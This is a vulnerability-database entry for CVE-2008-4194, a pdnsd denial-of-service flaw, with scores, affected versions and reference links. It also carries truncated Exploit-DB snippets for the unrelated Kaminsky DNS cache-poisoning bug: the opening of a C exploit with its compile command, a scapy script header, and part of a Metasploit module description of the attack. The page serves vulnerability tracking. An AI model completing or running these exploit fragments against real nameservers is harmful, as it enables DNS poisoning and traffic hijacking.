CVE-2008-4194
Published 2008-09-24
CVE-2008-4194: The p_exec_query function in src/dns_query.c in pdnsd before 1.2.7-par allows remote attackers to cause a denial of service (daemon crash) via a long DNS reply…
Priority P4 · 26 · medium · 5 · CVSS 2.0
AV:N/AC:L/Au:N/C:N/I:N/A:P
EXPLOIT
EPSS: 6.93% (93.3th percentile)
The p_exec_query function in src/dns_query.c in pdnsd before 1.2.7-par allows remote attackers to cause a denial of service (daemon crash) via a long DNS reply with many entries in the answer section, related to a "dangling pointer bug."
Affected
16 ranges
| Vendor | Product | Version range | Fixed in |
|---|---|---|---|
| pdnsd | pdnsd | <= 1.2.6-par | — |
No detection rules found.
Exploit-DB
BIND 9.x - Remote DNS Cache Poisoning
exploitdb · 2008-07-25 · CVSS 6.8
---
/*
* Exploit for CVE-2008-1447 - Kaminsky DNS Cache Poisoning Attack
*
* Compilation:
* $ gcc -o kaminsky-attack kaminsky-attack.c `dnet-config --libs` -lm
*
* Dependency: libdnet (aka libdumbnet-dev under Ubuntu)
*
* Author: marc.bevand at rapid7 dot com
*/
#define _BSD_SOURCE
#include
#include
#include
#include
#include
#include
#include
#include
#include
#define DNSF_RESPONSE (1 size)
fprintf(stderr, "format_domain overflow\n"), exit(1);
buf[bufi++] = i - j;
memcpy(buf + bufi, name + j, i - j);
bufi += i - j;
j = i + 1;
}
i++;
}
if (bufi + 1 + 2 + 2 > size)
fprintf(stderr, "format_domain overflow\n"), exit(1);
buf[bufi++] = 0;
*len = bufi;
}
void format_qr(u_char *buf, unsigned size, unsigned *len, const char *name, uint16_t type, uint16_t
Exploit-DB
BIND 9.x - Remote DNS Cache Poisoning
exploitdb · 2008-07-24 · CVSS 6.8
---
from scapy import *
import random
# Copyright (C) 2008 Julien Desfossez
# http://www.solisproject.net/
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License
# along with this program; if not, write to the Free Software
# Foundation, Inc., 59 Temp
Exploit-DB
BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)
exploitdb · 2008-07-23
H D Moore
===============/========================================================
Description
This exploit targets a fairly ubiquitous flaw in DNS implementations
which allow the insertion of malicious DNS records into the cache of the
target nameserver. This exploit caches a single malicious nameserver
entry into the target nameserver which replaces the legitimate
nameservers for the target domain. By causing the target nameserver to
query for random hostnames at the target domain, the attacker can spoof
a response to the target server including an answer for the query, an
authority server record, and an additional record for that server,
causing target nameserver to insert the additional record into the
cache. This insertion completely replaces the original nameserver
recor
No writeups or analysis indexed.
http://www.phys.uu.nl/~rombouts/pdnsd.html
http://www.phys.uu.nl/~rombouts/pdnsd/ChangeLog
http://www.vupen.com/english/advisories/2008/2582
https://exchange.xforce.ibmcloud.com/vulnerabilities/45594
Published: 2008-09-24